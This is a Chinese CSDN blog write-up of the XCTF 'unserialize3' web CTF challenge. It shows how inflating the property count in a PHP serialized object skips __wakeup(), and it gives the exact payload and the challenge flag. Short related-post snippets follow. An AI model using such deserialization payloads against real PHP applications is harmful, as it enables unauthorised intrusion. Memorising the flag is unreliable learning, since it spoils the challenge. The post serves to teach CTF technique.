【攻防世界-Web进阶篇-005unserialize3】

最新推荐文章于 2023-03-18 10:59:16 发布
最新推荐文章于 2023-03-18 10:59:16 发布
阅读量2.7k 收藏 1
点赞数 1
文章标签: php 开发语言 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gyy990526/article/details/123474976
版权

解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。

题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 :

<?php
    class xctf{ 
    public $flag = '111';
    public function __wakeup(){
    exit('bad requests');
        }
    }
    $xctf=new xctf();
    echo(serialize($xctf));
?>

序列化结果:O:4:"xctf":1:{s:4:"flag";s:3:"111";}

又因为_wakeup()的原因,需要让_wakeup()失效实现绕过,当属性个数不正确时,_wakeup()内部函数返回值出现异常导致其它函数无法执行,就不会执行_wakeup()函数,所以咱们只需要让序列化结果中的属性值改变即可,如1->2.

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

 如果不做修改就会执行_wakeup()函数

 所以

payload:?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

 cyberpeace{1c3996e230aa1ae7c4242a483ad76028}

旧梦已逝丶
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】unserialize3解题详析(php序列化反序列化实例讲解)
等风来
05-21 4630
在 PHP 中,可以使用 serialize() 函数将对象序列化为字符串,然后保存到文件或传输到其他应用程序中。在 PHP 中,可以使用 unserialize() 函数将序列化后的字符串还原为原始的对象或数据,然后行处理。对象被序列化并存储为字符串后,如果再次反序列化该字符串并尝试重建相应的对象时,PHP 就会自动调用该对象的。则是将序列化后的数据重新转换为对象、数据结构或变量的过程,以便在程序中行操作或处理。在反序列化对象时自动调用,用于初始化对象的属性等操作。的对象,该对象有一个属性。
serialize()序列化引起的魔术方法__wakeup()函数漏洞—攻防世界-web萌新-unserialize3
Sea_Sand息禅
04-17 3422
知识点: 1、serialize()函数:用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 2、unserialize()函数:用于将通过serialize()函数序列化后的对象或数组行反序列化,并返回原始的对象结构。 3、魔术方法:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除...
攻防世界--unserialize3 fileinclude
tzyyyyyy的博客
02-06 624
攻防世界--unserialize3 fileinclude
攻防世界web---unserialize3
m0_72447684的博客
10-10 236
攻防世界web---unserialize3
攻防世界-Reverse-Reversing-x64Elf-100
wuh2333的博客
03-18 345
攻防世界,逆向,Reversing-x64Elf-100
攻防世界webunserialize3
gongjingege的博客
07-15 501
打开链接 代码审计,初步判断code传参获取flag,序列化绕过_wakeup()函数得到payload 编写一个xctf类并序列化,运行代码 得到payload :O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} __wakeup()漏洞就是与整个属性个数值有关。当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行 所以将1改为比1大的就行,code传参 得到flag 知识点:_wakeup()函数漏洞,反序列化 2020.7.15 公瑾
chrome-unserialize-php-crx插件
04-02
语言:English 将php-serialized数据转换回用于人类可读的... 可以选择var_export或json ... 可以选择var_export或json 无法解决循环参考(如果真的需要,请在Github上提出问题) 谢谢: ... - 固定var_export库未引用对象键
typecho-1.1-15.5.12-beta.zip
03-17
3. 设计安全的程序架构,避免在敏感操作中使用反序列化。 4. 及时更新和打补丁,确保使用的是官方发布的最新安全版本。 对于Typecho用户而言,及时升级到最新版本是防范此漏洞的关键。官方可能已经修复了这一问题,...
webtech2-zadanie6-API
04-18
3. **RESTful API设计原则**:REST(Representational State Transfer)是一种架构风格,常用于构建Web服务。其核心思想是资源导向,通过HTTP方法(GET、POST、PUT、DELETE等)来操作资源。理解这些方法以及状态码...
Python-php2go使用Golang实现PHP的常见内置函数
08-10
此外,还有一些其他功能,如`json_encode()`和`json_decode()`用于JSON数据的编码解码,`serialize()`和`unserialize()`用于序列化和反序列化对象,以及`sha1()`、`md5()`等哈希函数。 该项目的源代码可以在GitHub...
攻防世界Webunserialize3
weixin_45808483的博客
12-09 335
题目链接 https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4821&page=1 启动环境 分析代码 代码定义了一个类,其中有一个方法 wakeup() , _wakeup()会直接退出,并输出" bad requests " 末尾有" ?code= " 看样子是要构造url来绕过wakeup()这个函数了。 当对一个对象序列化时,php就会调用sleep方法(如果存在的话
攻防世界-unserialize3详解
Mr_helloword的博客
08-11 5977
unserialize3 查看源代码: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 这是一个利用反序列字符串来行绕过的题,根据提示我们要构造code参数,但是需要绕过wakeup函数 **__wakeup()**是PHP的一个魔法函数,在unserialize反序列化的时候,首先查看有无该函数有的话 就会先执行他 绕过: 可以通过增加对象的属性个数来行绕过
攻防世界 unserialize3
weixin_52268949的博客
01-28 1433
unserialize3 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } ?code= 入题目给出部分代码,注意发现到有个wakeup()函数,我们要想办法绕过这个函数,wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这也算是一个绕过点 我们编写exp class xctf { public $flag = '
攻防世界webunserialize3
qq_42728977的博客
01-10 237
这个题目不难,主要是从这个题我学会了反序列化漏洞的基本原理。核心思想就是:当行反序列化的时候,字符串会被发序列化为对象,而对象中又可能有一些危险函数,以及整个过程中会触发一些魔法函数,而导致可空字符串变为可执行的代码。 还需要练几个类似的题。 题目: unserialize3 原理: 反发序列化漏洞(对象注入) 环境: sublime,chmore 解题过程: 简单访问: 可以看到,在xct...
攻防世界 easy_serialize_php
CyhDl666的博客
02-25 498
上来直接给源码 直接在代码中加入自己的理解 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); //implode()函数:把数组元素组合为字符串: $filter = '/'.implode('|',$filter_arr).'/i'; //$filter的值就是/php|flag|php5|.
攻防世界Web unserialize3
hhh
05-07 1303
unserialize3 啊啊啊啊好累不想写题解 ------------------------------------------------------------------------------------------------正经的分割线 主要考查了反序列化中的__wakeup函数的漏洞: 一个字符串或对象被序列化后,如果其属性被修改,则不会执行__wakeup()函数,可...
攻防世界-Web-unserialize3
分享与记录
06-14 616
之前其实就记录过一篇反序列化的。PHP反序列化-(web_php_unserialize)那个反序列化的题目,比这个复杂一些。既然好久没练,而且在攻防世界上看到了这个 unserialize3 的题目,就复习一下反序列化吧。先 new 一个对象,然后将其序列化,代码如下: 序列化的结果如下: 表示序列化的对象中只有一个属性,如果待反序列化的字符串中,属性个数与实际不符合,则 失效。因此,将 改为 绕过 。传参结果如下:......
Poem Codes - 攻防世界(Decrypt-the-Message)
J1ayの博客
08-16 2401
⭐Poem Codes Poem Code 最显著的特点就是一首诗歌。 详情请戳这里 让我们一起来过滤一遍这个神奇的加密过程~ ① 给出一首诗歌 for my purpose holds to sail beyond the sunset, and the baths of all the western stars until I die. ② 给出5个关键单词。 “for”, “sail”, “all”, “stars”, “die.” 对其行拆散: f o r s a i l a l l
XCTF web unserialize3(反序列化漏洞)
H4ppyD0g的博客
09-06 473
php序列化就是将复杂的数据类型(比如说数组,字典等)转换为字符串,方便传输或者存库等操作。 serialize():用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 unserialize() 可以将serialize序列化复杂数据类型后得到的字符串类型的数据重新转换成原来复杂的数据类型。 魔术方法:php将所有以 __(两个...
攻防世界web新手题unserialize3
最新发布
05-05
题目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ... $a = unserialize($_GET['a']);...首先看到这是一个传入参数行反序列化的题目,...最后将序列化后的字符串作为 $_GET['a'] 的值传入即可,访问 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值